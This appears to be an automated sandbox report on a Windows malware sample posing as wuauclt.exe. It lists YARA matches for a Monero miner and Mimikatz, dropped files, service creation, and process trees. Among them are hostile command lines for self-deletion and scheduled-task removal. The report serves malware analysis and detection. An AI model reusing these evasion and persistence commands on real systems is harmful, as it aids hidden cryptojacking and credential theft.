      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.1.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.2.svchost.exe.30b5240.2.unpack, type: UNPACKEDPEMatched rule: MAL_Metasploit_Framework_UA date = 2018-08-16, author = Florian Roth, description = Detects User Agent used in Metasploit Framework, reference = https://github.com/rapid7/metasploit-framework/commit/12a6d67be48527f5d3987e40cac2a0cbb4ab6ce7, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 1743e1bd4176ffb62a1a0503a0d76033752f8bd34f6f09db85c2979c04bbdd29
      Source: 2.3.svchost.exe.4f37468.32.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.7c7468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 15.0.ctfmon.exe.997468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.41.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4b77268.54.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.2.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 2.3.svchost.exe.5900000.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 23.2.dllhost.exe.2897468.2.raw.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 2.3.svchost.exe.4f00000.10.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 33.0.ctfmon.exe.790000.0.unpack, type: UNPACKEDPEMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 16.0.dllhostex.exe.1290000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 2.3.svchost.exe.5900000.9.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000002.968926651.000000000309D000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000000.695147785.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: 00000002.00000002.968774833.0000000003012000.00000004.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: svchost.exe PID: 5008, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: Process Memory Space: dllhostex.exe PID: 7088, type: MEMORYSTRMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: C:\Windows\SysWOW64\WUDHostServices.exe, type: DROPPEDMatched rule: hacktool_windows_mimikatz_copywrite author = @fusionrace, description = Mimikatz credential dump tool: Author copywrite, reference = https://github.com/gentilkiwi/mimikatz, md5_5 = 09c542ff784bf98b2c4899900d4e699c5b2e2619a4c5eff68f6add14c74444ca, md5_6 = 09054be3cc568f57321be32e769ae3ccaf21653e5d1e3db85b5af4421c200669, md5_3 = 0fee62bae204cf89d954d2cbf82a76b771744b981aef4c651caab43436b5a143, md5_4 = 004c07dcd04b4e81f73aacd99c7351337f894e4dac6c91dcfaadb4a1510a967c, md5_1 = 0c87c0ca04f0ab626b5137409dded15ac66c058be6df09e22a636cc2bcb021b8, md5_2 = 0c91f4ca25aedf306d68edaea63b84efec0385321eacf25419a3050f2394ee3b
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
      Source: C:\Windows\SysWOW64\dllhostex.exe, type: DROPPEDMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
      Source: C:\Users\user\Desktop\wuauclt.exeFile deleted: C:\Windows\SysWOW64\text.logJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeFile created: C:\Windows\SysWOW64\text.logJump to behavior
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: String function: 00971640 appears 34 times
      Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: String function: 02FB1640 appears 34 times
      Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03998D80 appears 44 times
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: String function: 01351E90 appears 40 times
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 02871640 appears 34 times
      Source: C:\Windows\SysWOW64\dllhost.exeCode function: String function: 02E11640 appears 34 times
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01347F80 NtDeviceIoControlFile,WSASetLastError,WSAGetLastError,16_2_01347F80
      Source: C:\Windows\SysWOW64\dllhostex.exeCode function: 16_2_01347F80: NtDeviceIoControlFile,WSASetLastError,WSAGetLastError,16_2_01347F80
      Source: wuauclt.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: classification engineClassification label: mal100.troj.expl.evad.mine.winEXE@48/9@202/67
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: RegOpenKeyExA,RegQueryValueExA,SetLastError,RegCloseKey,lstrlenA,lstrlenA,lstrlenA,lstrlenA,RegSetValueExA,RegCloseKey,SetLastError,lstrlenA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SetLastError,OpenSCManagerA,wsprintfA,wsprintfA,CreateServiceA,wsprintfA,lstrlenA,lstrlenA,lstrcatA,lstrlenA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00256CF0
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: lstrlenA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,SetLastError,OpenSCManagerA,wsprintfA,wsprintfA,CreateServiceA,wsprintfA,lstrlenA,lstrlenA,lstrcatA,lstrlenA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00256E80
      Source: C:\Users\user\Desktop\wuauclt.exeCode function: 0_2_00257040 OpenSCManagerA,OpenServiceA,StartServiceA,CloseServiceHandle,CloseServiceHandle,0_2_00257040
      Source: C:\Windows\SysWOW64\ctfmon.exeCode function: 15_2_00969740 GetSystemDirectoryA,DeleteFileA,DeleteFileA,DeleteFileA,FindResourceA,InitializeCriticalSection,SizeofResource,LoadResource,LockResource,WaitForSingleObject,DeleteFileA,DeleteFileA,15_2_00969740
      Source: wuauclt.exeVirustotal: Detection: 83%
      Source: wuauclt.exeMetadefender: Detection: 54%
      Source: wuauclt.exeReversingLabs: Detection: 96%
      Source: C:\Users\user\Desktop\wuauclt.exeFile read: C:\Users\user\Desktop\wuauclt.exeJump to behavior
      Source: C:\Users\user\Desktop\wuauclt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\wuauclt.exe "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe -k netsvcs
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5
      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhostex.exe C:\Windows\system32\dllhostex.exe
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\dllhostex.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exe
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Users\user\Desktop\wuauclt.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /FJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhostex.exe C:\Windows\system32\dllhostex.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\SearchProtocolHost.exe C:\Windows\system32\searchprotocolhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\dllhost.exe C:\Windows\system32\dllhost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\ctfmon.exe C:\Windows\system32\ctfmon.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 5 Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exeJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\SysWOW64\WUDHostServices.exe C:\Windows\system32\WUDHostServices.exe
      Source: C:\Users\user\Desktop\wuauclt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03991630 Sleep,CreateToolhelp32Snapshot,Process32First,OpenProcess,K32GetModuleFileNameExA,CloseHandle,Process32Next,CloseHandle,2_2_03991630
      Source: C:\Windows\SysWOW64\svchost.exeMutant created: \BaseNamedObjects\{E2088B81F-2A96-43E8-B9F522B}
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
